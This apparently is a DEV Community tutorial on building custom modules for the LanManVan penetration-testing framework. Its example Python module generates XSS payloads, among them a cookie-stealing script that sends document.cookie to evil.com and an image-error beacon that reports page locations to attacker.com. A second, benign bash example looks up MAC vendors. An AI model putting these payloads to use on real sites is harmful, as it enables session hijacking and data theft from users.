DEV Community

hmza
hmza

Posted on

LanManVan: How to Create Your Own Modules

#cybersecurity #go #metasploit #opensource

Contributing to LanManVan: How to Create Your Own Modules

Hey hackers! πŸ‘‹ Welcome back!

In my last post, I walked you through installing LanManVan β€” the fast, Go-powered modular framework for security research and penetration testing. By now, you should have the interactive shell running and over 80 modules at your fingertips.

But the real power of LanManVan comes from its extensibility. Anyone can create new modules β€” and it's incredibly easy!

Today, I'll show you exactly how to build your own custom modules (Python or Bash), add options, test them, and run them inside the framework. No complex setup required.

Why Create Modules?

  • Add your favorite tools
  • Share recon scripts, exploit helpers, encoders, or post-exploitation utilities
  • Keep everything organized in one interactive shell
  • Contribute back to the community!

Step 1: Launch LanManVan 

lanmanvan
Enter fullscreen mode Exit fullscreen mode

You'll see the beautiful banner and prompt:

hmza@0root ❯
Enter fullscreen mode Exit fullscreen mode

Step 2: Create a New Module

Use the built-in create command:

create mytool python
Enter fullscreen mode Exit fullscreen mode

or for Bash:

create mytool bash
Enter fullscreen mode Exit fullscreen mode

Example:

hmza@0root ❯ create xss-payload-gen python
[+] Module 'xss-payload-gen' created successfully
[*] Location: /home/hmza/lanmanvan/modules/xss-payload-gen
Enter fullscreen mode Exit fullscreen mode

This automatically creates:

  • A module directory
  • module.yaml (metadata)
  • main.py or main.sh (your code)

Step 3: Edit Your Module

Use the built-in edit command:

edit xss-payload-gen
Enter fullscreen mode Exit fullscreen mode

It opens the module directory with your default editor (nano/vim/etc.) and lists files:

Files in module:
  β”œβ”€ main.py
  └─ module.yaml
Enter fullscreen mode Exit fullscreen mode

Edit module.yaml (Metadata)

This tells LanManVan about your module:

name: xss-payload-gen
description: "Generates common XSS payloads with encoding options"
type: python
author: Your Name
version: 1.0.0
tags:
  - web
  - xss
  - payload
options:
  type:
    type: string
    description: Payload type (alert, steal-cookie, etc.)
    required: true
    default: alert
  encode:
    type: string
    description: Encoding (url, html, base64, none)
    required: false
    default: url
required:
  - type
Enter fullscreen mode Exit fullscreen mode

Edit main.py (Your Code)

Arguments are passed via environment variables (ARG_<NAME>):

#!/usr/bin/env python3
"""
Module: xss-payload-gen
"""

import os
import urllib.parse
import base64

def url_encode(s):
    return urllib.parse.quote(s)

def html_encode(s):
    return s.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;')

def main():
    payload_type = os.getenv('ARG_TYPE', 'alert')
    encode = os.getenv('ARG_ENCODE', 'url').lower()

    payloads = {
        'alert': '<script>alert(1)</script>',
        'steal-cookie': '<script>fetch("https://evil.com/steal?cookie="+document.cookie)</script>',
        'beacon': '<img src=x onerror="fetch(\'https://attacker.com/log?p=\'+document.location)">'
    }

    base = payloads.get(payload_type, payloads['alert'])

    if encode == 'url':
        result = url_encode(base)
    elif encode == 'html':
        result = html_encode(base)
    elif encode == 'base64':
        result = base64.b64encode(base.encode()).decode()
    else:
        result = base

    print(f"[+] Generated payload ({payload_type}, {encode}-encoded):")
    print("")
    print(result)
    print("")
    print("[*] Copy and test in your target!")

if __name__ == '__main__':
    main()
Enter fullscreen mode Exit fullscreen mode

Save and exit.

Step 4: Test Your Module

Quick Info 

xss-payload-gen!
Enter fullscreen mode Exit fullscreen mode

Shows options and description instantly.

Run It!

Shorthand:

xss-payload-gen type=steal-cookie encode=none
Enter fullscreen mode Exit fullscreen mode

Or with spaces:

xss-payload-gen type = beacon encode = base64
Enter fullscreen mode Exit fullscreen mode

With threading or logging:

xss-payload-gen type=alert threads=5 save=1
Enter fullscreen mode Exit fullscreen mode

Output saved to ./logs/ with timestamp.

Bash Modules? Just as Easy!

Create one:

create mac-lookup bash
Enter fullscreen mode Exit fullscreen mode

Edit main.sh:

#!/bin/bash
VENDOR=$(curl -s "http://api.macvendors.com/$ARG_MAC")
echo "[+] MAC: $ARG_MAC"
echo "[+] Vendor: ${VENDOR:-Unknown}"
Enter fullscreen mode Exit fullscreen mode

And module.yaml:

options:
  mac:
    type: string
    description: MAC address to lookup
    required: true```
{% endraw %}


Run:
{% raw %}


```sh
mac-lookup mac=00:11:22:33:44:55
Enter fullscreen mode Exit fullscreen mode

Pro Tips

  • Use search <keyword> to find similar modules
  • Use info <module> for detailed view
  • Use save=1 to log output
  • Use threads=N for concurrent execution (where supported)
  • Global vars: timeout=? or proxy=http://127.0.0.1:8080

Share Your Modules!

Once you're happy:

  1. Put your module in its own GitHub repo
  2. Add a module.yaml
  3. Open a PR to add it to community repos!

Or just use lmv_module to install from any public repo.

Ready to Build?

LanManVan makes module development fun and fast. No boilerplate, no complex APIs β€” just write your tool and run it in a powerful shell.

Start creating today:

lanmanvan
hmza@0root ❯ create my-awesome-tool python
Enter fullscreen mode Exit fullscreen mode

I can't wait to see what you build! πŸš€

Repository: https://github.com/hmZa-Sfyn/lanmanvan

Drop your modules, ideas, or PRs β€” let's grow this together!

Happy hacking (ethically, always)! πŸ”΄

Tags: golang, cybersecurity, module-development, penetration-testing, red-team, open-source, hacking-tools

Top comments (0)